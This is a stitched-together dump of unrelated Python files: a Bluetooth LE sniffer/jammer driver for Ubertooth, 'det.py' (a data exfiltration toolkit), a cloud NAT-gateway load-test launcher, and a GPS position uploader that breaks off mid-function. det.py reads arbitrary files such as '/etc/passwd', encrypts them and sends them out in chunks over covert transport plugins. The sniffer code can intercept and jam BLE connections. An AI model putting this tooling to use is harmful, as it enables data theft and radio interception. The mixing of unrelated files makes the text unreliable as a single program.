>>> device.sniffNewConnections(address="1A:2B:3C:4D:5E:6F")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sniffingMode = BLESniffingMode.NEW_CONNECTION
self.synchronized = False
self.lock.acquire()
self._stop()
if self.jamming:
self._setJamMode(JAM_CONTINUOUS)
else:
self._setJamMode(JAM_NONE)
self._setTarget(address)
self._setCRCChecking(False)
self._start()
self.lock.release()
if channel is None:
channel = 37
if not self.sweepingMode:
self.setChannel(channel)
def sniffExistingConnections(self,accessAddress=None,crcInit=None,channelMap=None):
'''
This method starts the existing connections sniffing mode.
:param accessAddress: selected Access Address - if not provided, the parameter is recovered
:type address: int
:param crcInit: selected CRCInit - if not provided, the parameter is recovered
:type crcInit: int
:param channelMap: selected Channel Map - if not provided, the parameter is recovered
:type channelMap: int
:Example:
>>> device.sniffExistingConnections()
>>> device.sniffExistingConnections(accessAddress=0xe5e296e9)
>>> device.sniffAdvertisements(accessAddress=0xe5e296e9, crcInit=0x0bd54a)
>>> device.sniffAdvertisements(accessAddress=0xe5e296e9, crcInit=0x0bd54a, channelMap=0x1fffffffff)
.. warning::
Please note the following warnings :
* Ubertooth is currently not able to set the CRC Init value and always uses a full Channel Map (0x1fffffffff). These parameters are accepted only to keep the same API for Ubertooth and BTLEJack devices.
* If no access address is provided, Ubertooth collects multiple candidate access addresses and selects the most probable one
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sniffingMode = BLESniffingMode.EXISTING_CONNECTION
self.synchronized = False
self.lock.acquire()
self._stop()
if self.jamming:
self._setJamMode(JAM_CONTINUOUS)
else:
self._setJamMode(JAM_NONE)
self._setCRCChecking(False)
if accessAddress is not None:
self._setAccessAddress(accessAddress)
else:
self._setTarget("00:00:00:00:00:00")
if crcInit is not None:
io.warning("Ubertooth is not able to set CrcInit value ! Parameter will be ignored.")
if channelMap is not None:
io.warning("Ubertooth uses full channel map : 0x1fffffffff. Parameter will be ignored.")
self._start()
self.lock.release()
def _start(self):
if self.sniffingMode == BLESniffingMode.EXISTING_CONNECTION:
self._setPromiscuousMode()
elif self.sniffingMode == BLESniffingMode.NEW_CONNECTION:
self._setBTLESniffing()
elif self.sniffingMode == BLESniffingMode.ADVERTISEMENT:
self._setBTLESniffing()
def setScanInterval(self,seconds=1):
'''
This method sets the scan interval (in seconds).
:param seconds: number of seconds to wait between two channels
:type seconds: float
:Example:
>>> device.setScanInterval(seconds=1)
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.scanInterval = seconds
def _scanThread(self):
self.setChannel(37)
utils.wait(seconds=self.scanInterval)
self.setChannel(38)
utils.wait(seconds=self.scanInterval)
self.setChannel(39)
utils.wait(seconds=self.scanInterval)
def setScan(self,enable=True):
'''
This method enables or disables the scanning mode, which cycles through the advertising channels according to the scan interval parameter.
:param enable: boolean indicating if the scanning mode must be enabled
:type enable: bool
:Example:
>>> device.setScan(enable=True) # scanning mode enabled
>>> device.setScan(enable=False) # scanning mode disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if enable:
self.sniffAdvertisements()
self._setCRCChecking(True)
if self.scanThreadInstance is None:
self.scanThreadInstance = wireless.StoppableThread(target=self._scanThread)
self.scanThreadInstance.start()
else:
self.scanThreadInstance.stop()
self.scanThreadInstance = None
def recv(self):
self.lock.acquire()
data = self._poll()
self.lock.release()
if data is not None and len(data) > 1:
#print(bytes(data).hex())
packet = Ubertooth_Hdr(bytes(data))
if BTLE_Promiscuous_Access_Address in packet:
self._updateAccessAddress(packet.access_address)
elif BTLE_Promiscuous_CRCInit in packet:
self._updateCrcInit(packet.crc_init)
self._updateChannelMap()
elif BTLE_Promiscuous_Hop_Interval in packet:
self._updateHopInterval(packet.hop_interval)
elif BTLE_Promiscuous_Hop_Increment in packet:
self._updateHopIncrement(packet.hop_increment)
self.synchronized = True
else:
if BTLE_CONNECT_REQ in packet or hasattr(packet,"PDU_type") and packet.PDU_type == 5:
self._stopSweepingThread()
self.accessAddress = (struct.unpack(">I",struct.pack("<I",packet.AA))[0])
self.crcInit = (struct.unpack(">I",b"\x00" + struct.pack('<I',packet.crc_init)[:3])[0])
self.channelMap = (packet.chM)
self.hopInterval = (packet.interval)
self.hopIncrement = (packet.hop)
self.synchronized = True
payload = bytes(packet[1:])[4:-3]
givenCrc = bytes(packet[1:])[-3:]
if helpers.crc24(payload,len(payload)) == givenCrc or not self.crcEnabled:
return packet
return None
else:
return None
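# Illustrative polling loop (assuming `device` is a BLEUbertoothDevice already configured
# via sniffNewConnections() or sniffExistingConnections()); recv() returns a Scapy packet
# once a frame passes the optional CRC check, or None otherwise:
# >>> device.sniffExistingConnections()
# >>> while True:
# ...     packet = device.recv()
# ...     if packet is not None and device.isSynchronized():
# ...         packet.show()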
def _setJamMode(self,mode=JAM_NONE):
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_JAM_MODE,mode, 0)
def _setFrequency(self,channel=2402):
self.ubertooth.ctrl_transfer(CTRL_OUT, UBERTOOTH_SET_CHANNEL, channel, 0)
def _getFrequency(self):
channel = self.ubertooth.ctrl_transfer(CTRL_IN,UBERTOOTH_GET_CHANNEL,0, 0,2)
channel = struct.unpack('H',channel)[0]
return channel
def _getAccessAddress(self):
aa = self.ubertooth.ctrl_transfer(CTRL_IN,UBERTOOTH_GET_ACCESS_ADDRESS,0, 0,4)
aa = struct.unpack('<I',aa)[0]
return aa
def _setAccessAddress(self,aa):
data = array.array("B", [ (aa & 0xFF) ,(aa & 0x0000FF00) >> 8, (aa & 0x00FF0000) >> 16, (aa & 0xFF000000) >> 24])
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_SET_ACCESS_ADDRESS,0,0, data,timeout=3000)
def _setTarget(self,target="00:00:00:00:00:00"):
utils.wait(seconds=1)
data = array.array("B", bytes.fromhex(target.replace(":",""))+bytes(0x30))
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_BTLE_SET_TARGET,0,0, data,timeout=5000)
def _setBTLESniffing(self):
utils.wait(seconds=0.5)
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_BTLE_SNIFFING,
(0 if self.sniffingMode == BLESniffingMode.ADVERTISEMENT else 2), 0)
def _setPromiscuousMode(self):
utils.wait(seconds=0.5)
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_BTLE_PROMISC,0, 0)
def _poll(self):
try:
result = self.ubertooth.ctrl_transfer(CTRL_IN,UBERTOOTH_POLL,0, 0,512,timeout=100)
utils.wait(seconds=0.001)
except usb.core.USBError as e:
#io.fail("USB Error : "+str(e))
return array.array('B',[])
return result
|
det.py
|
from __future__ import print_function
import os
import random
import threading
import hashlib
import argparse
import sys
import string
import time
import json
import signal
import struct
import tempfile
from random import randint
from os import listdir
from os.path import isfile, join
from Crypto.Cipher import AES
from Crypto.Cipher import XOR
from zlib import compress, decompress
from plugins import dukpt
import base64
import csv
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
if getattr(sys, 'frozen', False):
os.chdir(sys._MEIPASS)
KEY = ""
MIN_TIME_SLEEP = 1
MAX_TIME_SLEEP = 30
MIN_BYTES_READ = 1
MAX_BYTES_READ = 500
COMPRESSION = True
files = {}
threads = []
config = None
dukpt_client = None
dukpt_server = None
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def display_message(message):
print("[%s] %s" % (time.strftime("%Y-%m-%d.%H:%M:%S", time.gmtime()), message))
def warning(message):
display_message("%s%s%s" % (bcolors.WARNING, message, bcolors.ENDC))
def ok(message):
display_message("%s%s%s" % (bcolors.OKGREEN, message, bcolors.ENDC))
def info(message):
display_message("%s%s%s" % (bcolors.OKBLUE, message, bcolors.ENDC))
# http://stackoverflow.com/questions/12524994/encrypt-decrypt-using-pycrypto-aes-256
def aes_encrypt(message, key=KEY):
try:
ksn = ""
# If using DUKPT, generate a new key
if dukpt_client:
key_info = dukpt_client.gen_key()  # renamed so it does not shadow the module-level info() logger
key = key_info['key']
ksn = key_info['ksn']
# Generate random CBC IV
iv = os.urandom(AES.block_size)
# Derive AES key from passphrase
aes = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv)
# Add PKCS5 padding
pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
# Return the IV (and KSN when DUKPT is used) followed by the encrypted message,
# so that aes_decrypt() can recover them from the head of the blob
return iv + ksn + aes.encrypt(pad(message))
except:
return None
def aes_decrypt(message, key=KEY):
try:
# Retrieve CBC IV
iv = message[:AES.block_size]
if dukpt_server:
ksn = message[AES.block_size:AES.block_size+dukpt_server.KSN_LEN]
message = message[AES.block_size+dukpt_server.KSN_LEN:]
key = dukpt_server.gen_key(ksn)
else:
message = message[AES.block_size:]
# Derive AES key from passphrase
aes = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv)
message = aes.decrypt(message)
# Remove PKCS5 padding
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
return unpad(message)
except:
return None
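# Round-trip sketch (not called anywhere), assuming the static AES_KEY mode (no DUKPT):
# aes_encrypt prepends the random IV, so aes_decrypt can recover it from the first block.
# The passphrase below is hypothetical.
def _sketch_aes_roundtrip():
    secret = "hello world"
    blob = aes_encrypt(secret, key="s3cr3t-passphrase")
    return aes_decrypt(blob, key="s3cr3t-passphrase") == secret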
# Do a md5sum of the file
def md5(f):
hash = hashlib.md5()
for chunk in iter(lambda: f.read(4096), ""):
hash.update(chunk)
return hash.hexdigest()
function_mapping = {
'display_message': display_message,
'warning': warning,
'ok': ok,
'info': info,
'aes_encrypt' : aes_encrypt,
'aes_decrypt': aes_decrypt
}
class Exfiltration(object):
def __init__(self, results, KEY):
self.KEY = KEY
self.plugin_manager = None
self.plugins = {}
self.results = results
self.target = "127.0.0.1"
path = "plugins/"
plugins = {}
# Load plugins
sys.path.insert(0, path)
for f in os.listdir(path):
fname, ext = os.path.splitext(f)
if ext == '.py' and self.should_use_plugin(fname):
mod = __import__(fname)
plugins[fname] = mod.Plugin(self, config["plugins"][fname])
def should_use_plugin(self, plugin_name):
# if the plugin has been specified specifically (-p twitter)
if self.results.plugin and plugin_name not in self.results.plugin.split(','):
return False
# if the plugin is not in the exclude param
elif self.results.exclude and plugin_name in self.results.exclude.split(','):
return False
else:
return True
def register_plugin(self, transport_method, functions):
self.plugins[transport_method] = functions
def get_plugins(self):
return self.plugins
def aes_encrypt(self, message):
return aes_encrypt(message, self.KEY)
def aes_decrypt(self, message):
return aes_decrypt(message, self.KEY)
def log_message(self, mode, message):
if mode in function_mapping:
function_mapping[mode](message)
def get_random_plugin(self):
plugin_name = random.sample(self.plugins, 1)[0]
return plugin_name, self.plugins[plugin_name]['send']
def use_plugin(self, plugins):
tmp = {}
for plugin_name in plugins.split(','):
if (plugin_name in self.plugins):
tmp[plugin_name] = self.plugins[plugin_name]
self.plugins.clear()
self.plugins = tmp
def remove_plugins(self, plugins):
for plugin_name in plugins:
if plugin_name in self.plugins:
del self.plugins[plugin_name]
display_message("{0} plugins will be used".format(
len(self.get_plugins())))
def register_file(self, message):
global files
jobid = message[0]
if jobid not in files:
files[jobid] = {}
files[jobid]['checksum'] = message[3].lower()
files[jobid]['filename'] = message[1].lower()
files[jobid]['data'] = []
files[jobid]['packets_order'] = []
files[jobid]['packets_len'] = -1
warning("Register packet for file %s with checksum %s" %
(files[jobid]['filename'], files[jobid]['checksum']))
def retrieve_file(self, jobid):
global files
fname = files[jobid]['filename']
filename = "%s.%s" % (fname.replace(
os.path.pathsep, ''), time.strftime("%Y-%m-%d.%H:%M:%S", time.gmtime()))
#Reorder packets before reassembling / ugly one-liner hack
files[jobid]['packets_order'], files[jobid]['data'] = \
[list(x) for x in zip(*sorted(zip(files[jobid]['packets_order'], files[jobid]['data'])))]
content = ''.join(str(v) for v in files[jobid]['data']).decode('hex')
content = aes_decrypt(content, self.KEY)
if COMPRESSION:
content = decompress(content)
try:
with open(filename, 'w') as f:
f.write(content)
except IOError as e:
warning("Got %s: cannot save file %s" % (e, filename))
raise e
if (files[jobid]['checksum'] == md5(open(filename))):
ok("File %s recovered" % (fname))
else:
warning("File %s corrupt!" % (fname))
del files[jobid]
def retrieve_data(self, data):
global files
try:
message = data
if (message.count("|!|") >= 2):
info("Received {0} bytes".format(len(message)))
message = message.split("|!|")
jobid = message[0]
# register packet
if (message[2] == "REGISTER"):
self.register_file(message)
# done packet
elif (message[2] == "DONE"):
files[jobid]['packets_len'] = int(message[1])
#Check if all packets have arrived
if files[jobid]['packets_len'] == len(files[jobid]['data']):
self.retrieve_file(jobid)
else:
warning("[!] Received the last packet, but some are still missing. Waiting for the rest...")
# data packet
else:
# making sure there's a jobid for this file
if (jobid in files and message[1] not in files[jobid]['packets_order']):
files[jobid]['data'].append(''.join(message[2:]))
files[jobid]['packets_order'].append(int(message[1]))
#In case this packet was the last missing one
if files[jobid]['packets_len'] == len(files[jobid]['data']):
self.retrieve_file(jobid)
except:
# re-raise so the caller notices malformed packets (the trailing "pass" was unreachable)
raise
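# Wire-format sketch: every exfiltrated chunk handled by retrieve_data() above is a
# "|!|"-separated record. Assuming a job id of "abc1234", a transfer looks roughly like:
#   "abc1234|!|passwd|!|REGISTER|!|<md5-of-file>"        announce file name and checksum
#   "abc1234|!|0|!|<hex-encoded ciphertext chunk>"       numbered data packets
#   "abc1234|!|<total packet count>|!|DONE"              trigger reassembly once complete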
class ExfiltrateFile(threading.Thread):
def __init__(self, exfiltrate, file_to_send):
threading.Thread.__init__(self)
self.file_to_send = file_to_send
self.exfiltrate = exfiltrate
self.jobid = ''.join(random.sample(
string.ascii_letters + string.digits, 7))
self.checksum = '0'
self.daemon = True
def run(self):
# checksum
if self.file_to_send == 'stdin':
file_content = sys.stdin.read()
buf = StringIO(file_content)
e = StringIO(file_content)
else:
with open(self.file_to_send, 'rb') as f:
file_content = f.read()
buf = StringIO(file_content)
e = StringIO(file_content)
self.checksum = md5(buf)
del file_content
# registering packet
plugin_name, plugin_send_function = self.exfiltrate.get_random_plugin()
ok("Using {0} as transport method".format(plugin_name))
# sending the data
f = tempfile.SpooledTemporaryFile()
data = e.read()
if COMPRESSION:
data = compress(data)
f.write(aes_encrypt(data, self.exfiltrate.KEY))
f.seek(0)
e.close()
packet_index = 0
maximum = 43000
methods = [ #8600 each
'aes',
'xor',
'plaintext',
'b64',
'b32'
]
file = open('etc/exfiltration_data.csv', 'rb')
reader = csv.reader(file)
for method in methods:
while (True):
if method == 'aes':
data_file = base64.standard_b64encode(f.read(randint(MIN_BYTES_READ, MAX_BYTES_READ)))
elif method == 'xor':
unencrypted = next(reader)[0]
key = "abcdefghijklmnopqrstuvwxqzabcdefghijklmnopqrstuvwxqzabcdefghijklmnopqrstuvwxqzabcdefghijklmnopqrstuvwxqz"
xor_cipher = XOR.new("".join(random.sample(key, 20)))
data_file = base64.b32encode(xor_cipher.encrypt(unencrypted)).lower()
elif method == 'plaintext':
data_file = next(reader)[0]
elif method == 'b64':
unencoded = next(reader)[0]
data_file = base64.standard_b64encode(unencoded)
elif method == 'b32':
unencoded = next(reader)[0]
data_file = base64.b32encode(unencoded).lower()
else:
break
while data_file[-1] == '=':
data_file = data_file[:len(data_file) - 1]
plugin_name, plugin_send_function = self.exfiltrate.get_random_plugin()
ok("Using {0} as transport method with method {1} : {2} ".format(plugin_name, method, packet_index))
data = data_file
try:
plugin_send_function(data)
except Exception as e:
print(e)
print("EXCEPTION! - skipping packet and not counting it...")
packet_index = packet_index + 1
if packet_index % 8600 == 0:
#time.sleep(10)
print("\n\n")
break
def signal_handler(signum, frame):
global threads
warning('Killing DET and its subprocesses')
os.kill(os.getpid(), signal.SIGKILL)
def main():
global MAX_TIME_SLEEP, MIN_TIME_SLEEP, KEY, MAX_BYTES_READ, MIN_BYTES_READ, COMPRESSION
global threads, config
global dukpt_client, dukpt_server
parser = argparse.ArgumentParser(
description='Data Exfiltration Toolkit (@PaulWebSec)')
parser.add_argument('-c', action="store", dest="config", default=None,
help="Configuration file (eg. '-c ./config-sample.json')")
parser.add_argument('-f', action="append", dest="file",
help="File to exfiltrate (eg. '-f /etc/passwd')")
parser.add_argument('-d', action="store", dest="folder",
help="Folder to exfiltrate (eg. '-d /etc/')")
parser.add_argument('-p', action="store", dest="plugin",
default=None, help="Plugins to use (eg. '-p dns,twitter')")
parser.add_argument('-e', action="store", dest="exclude",
default=None, help="Plugins to exclude (eg. '-e gmail,icmp')")
listenMode = parser.add_mutually_exclusive_group()
listenMode.add_argument('-L', action="store_true",
dest="listen", default=False, help="Server mode")
listenMode.add_argument('-Z', action="store_true",
dest="proxy", default=False, help="Proxy mode")
results = parser.parse_args()
if (results.config is None):
print("Specify a configuration file!")
parser.print_help()
sys.exit(-1)
with open(results.config) as data_file:
config = json.load(data_file)
# catch Ctrl+C
signal.signal(signal.SIGINT, signal_handler)
ok("CTRL+C to kill DET")
MIN_TIME_SLEEP = int(config['min_time_sleep'])
MAX_TIME_SLEEP = int(config['max_time_sleep'])
MIN_BYTES_READ = int(config['min_bytes_read'])
MAX_BYTES_READ = int(config['max_bytes_read'])
COMPRESSION = bool(config['compression'])
if 'IPEK' in config:
IPEK = config['IPEK']
KSN = config['KSN']
dukpt_client = dukpt.Client(IPEK.decode('hex'), KSN.decode('hex'))
elif 'BDK' in config:
BDK = config['BDK']
dukpt_server = dukpt.Server(BDK.decode('hex'))
else:
KEY = config['AES_KEY']
app = Exfiltration(results, KEY)
# LISTEN/PROXY MODE
if (results.listen or results.proxy):
threads = []
plugins = app.get_plugins()
for plugin in plugins:
if results.listen:
thread = threading.Thread(target=plugins[plugin]['listen'])
elif results.proxy:
thread = threading.Thread(target=plugins[plugin]['proxy'])
thread.daemon = True
thread.start()
threads.append(thread)
# EXFIL mode
else:
if (results.folder is None and results.file is None):
warning("[!] Specify a file or a folder!")
parser.print_help()
sys.exit(-1)
if (results.folder):
files = ["{0}{1}".format(results.folder, f) for
f in listdir(results.folder)
if isfile(join(results.folder, f))]
else:
files = list(set(results.file))
threads = []
for file_to_send in files:
info("Launching thread for file {0}".format(file_to_send))
thread = ExfiltrateFile(app, file_to_send)
threads.append(thread)
thread.daemon = True
thread.start()
# Join for the threads
for thread in threads:
while True:
thread.join(1)
if not thread.isAlive():
break
if __name__ == '__main__':
main()
|
natgw.py
|
# coding=utf-8
import os
import json
import sys
import time
from optparse import OptionParser
from threading import Thread
SERVER_CODE = r'''# coding=utf-8
import select
import socket
import time
from Queue import Queue
from threading import Thread
ADDRESS = ('%s', 8080)
class LogThread(Thread):
def __init__(self):
super(LogThread, self).__init__()
self.msg_queue = Queue(maxsize=10000)
def run(self):
f = open('./client_test.log', mode='w')
while True:
msg = self.msg_queue.get()
f.write(msg + '\n')
def add_msg(self, msg):
self.msg_queue.put(msg)
class Server(object):
def __init__(self):
self.connections = {}
def start(self):
logthr = LogThread()
logthr.setDaemon(True)
logthr.start()
server_sock = socket.socket()
server_sock.setblocking(False)
server_sock.bind(ADDRESS)
server_sock.listen(128)
epoll_obj = select.epoll()  # epoll matches the EPOLL* event masks used below
epoll_obj.register(server_sock.fileno(), select.EPOLLIN | select.EPOLLOUT | select.EPOLLERR)
stop_time = time.time() + 2400
while stop_time - time.time() > 0:
events = epoll_obj.poll()
# print(events)
for fd, event in events:
if fd == server_sock.fileno():
conn, address = server_sock.accept()
conn.setblocking(False)
epoll_obj.register(conn.fileno(), select.EPOLLIN)
self.connections[conn.fileno()] = conn
else:
if event & select.EPOLLIN:
data = self.connections[fd].recv(1024)
msg = data.decode("utf-8")
if msg == "end" or not data:
self.connections[fd].close()
epoll_obj.unregister(fd)
del self.connections[fd]
else:
logthr.add_msg(msg)
elif event & select.EPOLLOUT:
pass
elif event & select.EPOLLERR:
self.connections[fd].close()
epoll_obj.unregister(fd)
del self.connections[fd]
server_sock.close()
s = Server()
s.start()
'''
CLIENT_CODE = r'''#coding=utf-8
import random
import socket
import time
from Queue import Queue
import threading
import traceback
SERVERS = [%s]
MAX_THR = 25000
STEP = 21
max_count = MAX_THR
step_count = 500
lock = threading.RLock()
class LogThread(threading.Thread):
def __init__(self):
super(LogThread, self).__init__()
self.msg_queue = Queue(maxsize=10000)
def run(self):
f = open('./client_test.log', mode='w')
while True:
msg = self.msg_queue.get()
f.write(msg + '\n')
def add_msg(self, msg):
self.msg_queue.put(msg)
class ClientHandler(threading.Thread):
def __init__(self, id, logthr):
super(ClientHandler, self).__init__()
self.id = id
self.logthr = logthr
def run(self):
try:
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = random.sample(SERVERS, 1)[0]
server_addr = (server, 8080)
client_sock.connect(server_addr)
for r in range(0, STEP):
start_time = time.time()
if r == STEP - 1:
msg = 'end'
else:
msg = 'test client'
client_sock.send(msg.encode())
recv_data = client_sock.recv(1024)
self.logthr.add_msg("thread {} client received msg:{}".format(self.id, recv_data))
if time.time() - start_time < 60:
time.sleep(60 + start_time - time.time())
client_sock.close()
except Exception as e:
info = traceback.format_exc()
self.logthr.add_msg("thread {} exception:{}".format(self.id, info))
finally:
try:
lock.acquire()
global max_count
max_count = max_count - 1
finally:
lock.release()
class Main(object):
def __init__(self):
pass
def start(self):
logthr = LogThread()
logthr.setDaemon(True)
logthr.start()
step = MAX_THR / step_count
for i in range(step):
for j in range(step_count):
t = ClientHandler(i * step_count + j, logthr)
t.start()
time.sleep(2)
global max_count
while max_count > 0:
time.sleep(1)
logthr.add_msg('exited')
m = Main()
m.start()
'''.decode('utf-8')
def exec_cmd(cmd):
try:
val = os.popen(cmd)
print cmd
return val
except Exception as e:
print ('exec cmd {} failed'.format(e.message))
return None
def get_instance_infos(tag_id):
results = exec_cmd('/pitrix/cli/describe-instances -T %s -f /pitrix/conf/client.yaml' % tag_id)
result_json = get_json_data(results)
instance_list = result_json['instance_set']
return instance_list
def get_json_data(results):
need_datas = []
start = False
for line in results.readlines():
if line.startswith('recv'):
line = line.replace('recv:', '')
start = True
if start and '0' != line:
need_datas.append(line)
s = ''.join(need_datas)
val = json.loads(s)
return val
def start_server(instance):
instance_id = instance['instance_id']
host_machine = instance['host_machine']
ip_addr = instance['vxnets'][0]['private_ip']
tmp_file = './%s' % instance_id
fd = open(tmp_file, mode='w')
fd.write(SERVER_CODE % ip_addr)
fd.close()
cmd = 'scp %s root@%s:/root/' % (tmp_file, host_machine)
res = exec_cmd(cmd)
if res:
copy_cmd = '''ssh root@{host_machine} "safe-guest-ftp {instance_id} put '/root/{instance_id}' '/root/server.py' 5" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(copy_cmd)
start_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} 'python /root/server.py &' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(start_cmd)
rm_cmd = '''ssh root@{host_machine} "rm -f /root/{instance_id}" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(rm_cmd)
exec_cmd('rm -f %s' % tmp_file)
def start_client(instance, eip_str):
instance_id = instance['instance_id']
host_machine = instance['host_machine']
tmp_file = './%s' % instance_id
fd = open(tmp_file, mode='w')
content = CLIENT_CODE % eip_str
fd.write(content.encode('utf-8'))
fd.close()
cmd = 'scp %s root@%s:/root/' % (tmp_file, host_machine)
res = exec_cmd(cmd)
if res:
copy_cmd = '''ssh root@{host_machine} "safe-guest-ftp {instance_id} put '/root/{instance_id}' '/root/client.py' 5" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(copy_cmd)
start_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} 'python /root/client.py &' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(start_cmd)
rm_cmd = '''ssh root@{host_machine} "rm -f /root/{instance_id}" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(rm_cmd)
exec_cmd('rm -f %s' % tmp_file)
def start_service(server_tag, client_tag, client_only=0):
server_insts = get_instance_infos(server_tag)
eips = [i['eip']['eip_addr'] for i in server_insts]
if not client_only:
for server in server_insts:
new_task(start_server, server)
time.sleep(2)
client_insts = get_instance_infos(client_tag)
    format_eips = []
    for e in eips:
        format_eips.append('\'' + e + '\'')
    eip_str = ','.join(format_eips)
for client_inst in client_insts:
new_task(start_client, client_inst, eip_str)
def new_task(task, *args):
t = Thread(target=task, args=args)
t.start()
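# Upload a small kill script into the guest and run it to terminate the
# running server.py / client.py process.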
def stop(instance, script_name):
instance_id = instance['instance_id']
host_machine = instance['host_machine']
tmp_file = './%s.stop' % instance_id
fd = open(tmp_file, mode='w')
fd.write("ps -ef | grep %s.py|awk '{print $2}'| xargs kill -9" % script_name)
fd.close()
cmd = 'scp %s root@%s:/root/%s' % (tmp_file, host_machine, tmp_file)
res = exec_cmd(cmd)
if res:
copy_cmd = '''ssh root@{host_machine} "safe-guest-ftp {instance_id} put '/root/{instance_id}.stop' '/root/stop.sh' 5" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(copy_cmd)
ch_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} 'chmod +x /root/stop.sh' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(ch_cmd)
stop_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} './stop.sh' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(stop_cmd)
rm_cmd = '''ssh root@{host_machine} "rm -f /root/{instance_id}.stop" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(rm_cmd)
exec_cmd('rm -f %s' % tmp_file)
def stop_service(server_tag, client_tag, client_only=0):
if not client_only:
server_insts = get_instance_infos(server_tag)
for server in server_insts:
new_task(stop, server, 'server')
client_insts = get_instance_infos(client_tag)
for client in client_insts:
new_task(stop, client, 'client')
def _get_opt_parser():
''' get option parser '''
MSG_USAGE = '''%prog [-c "client_tag_id" -s "server_tag_id"] [options] [-f <conf_file>]'''
opt_parser = OptionParser(MSG_USAGE)
opt_parser.add_option("-c", "--client_tag_id", action="store", type="string",
dest="client_tag_id", help='''client_tag_id''', default="")
opt_parser.add_option("-o", "--client_only", action="store", type=int,
dest="client_only", help='''start client only''', default=0)
opt_parser.add_option("-s", "--server_tag_id", action="store", type="string",
dest="server_tag_id", help='''server_tag_id''', default="")
opt_parser.add_option("-a", "--action", action="store", type="string",
dest="action", help='''start or stop''', default="start")
return opt_parser
def main(args):
parser = _get_opt_parser()
(options, _) = parser.parse_args(args)
# send request
action = options.action
client_tag_id = options.client_tag_id
server_tag_id = options.server_tag_id
client_only = options.client_only
if not (client_tag_id or server_tag_id):
print '''params 'client_tag_id, server_tag_id' can't be empty'''
return
if action == 'start':
start_service(server_tag_id, client_tag_id, client_only=client_only)
elif action == 'stop':
stop_service(server_tag_id, client_tag_id, client_only=client_only)
else:
print 'invalid action %s' % action
if __name__ == "__main__":
main(sys.argv[1:])
|
SpotterNetPositionSend.py
|
#!/usr/bin/env python3
import json
import logging
import requests
import threading
import time
import socket
import sys
from datetime import datetime
from SpotterNetPositionObject import SNPosObject
TCP_IP = '127.0.0.1'
TCP_PORT = 2947
BUFFER_SIZE = 1024
START_MESSAGE = "?WATCH={\"enable\":true,\"json\":true}"
STOP_MESSAGE = "?WATCH={\"enable\":false}"
LOGIN_FILE = "/home/pi/SNPosition/SNLogin"
run = True
APPLICATION_ID = ""
seconds_since_update = 0.0
PosLock = threading.Lock()
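# Note: the SNPosObject class itself is used as a module-level position holder;
# its methods are called with the class passed explicitly as the first argument.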
oPosObject = SNPosObject
if len(sys.argv) > 1 and sys.argv[1] and sys.argv[1].lower() == '-i':
logging.basicConfig(filename='SNPositionUpdate.log', level=logging.INFO)
else:
logging.basicConfig(filename='SNPositionUpdate.log', level=logging.ERROR)
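# Read the Spotter Network application id from the key=value login file.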
def LoadUserFile():
    global APPLICATION_ID
    with open(LOGIN_FILE) as loginfile:
        for line in loginfile:
            arLine = line.split("=")
            if arLine[0] == "APPLICATIONID":
                APPLICATION_ID = arLine[1].strip()
def UpdatePos(dctPacket):
global oPosObject
if "time" in dctPacket.keys():
oPosObject.SetTime(oPosObject, dctPacket["time"])
else:
logging.info('No data available for "time"')
return
if "lat" in dctPacket.keys():
oPosObject.SetLat(oPosObject, dctPacket["lat"])
else:
logging.info('No data available for "lat"')
return
if "lon" in dctPacket.keys():
oPosObject.SetLon(oPosObject, dctPacket["lon"])
else:
logging.info('No data available for "lon"')
return
if "alt" in dctPacket.keys():
oPosObject.SetElev(oPosObject, dctPacket["alt"])
if "speed" in dctPacket.keys():
oPosObject.SetSpeed(oPosObject, dctPacket["speed"])
if "track" in dctPacket.keys():
oPosObject.SetDirection(oPosObject, dctPacket["track"])
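# POST the current position to the Spotter Network update endpoint, but only
# when the position object has changed since the last successful report.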
def POSTUpdate():
global oPosObject
if not oPosObject.Changed(oPosObject):
return
pload = {
'id':APPLICATION_ID,
'report_at':oPosObject.Time(oPosObject).strftime('%Y-%m-%d %H:%M:%S'),
'lat':oPosObject.Lat(oPosObject),
'lon':oPosObject.Lon(oPosObject),
'elev':oPosObject.Elev(oPosObject),
'mph':oPosObject.Speed(oPosObject),
'dir':oPosObject.Direction(oPosObject),
'active':1,
'gps':1
}
#print(pload)
oRequest = requests.post("https://www.spotternetwork.org/positions/update", data = pload)
if oRequest.status_code == 200:
oPosObject.ResetChanged(oPosObject)
logging.info('SN Updated at ' + datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'))
return True
else:
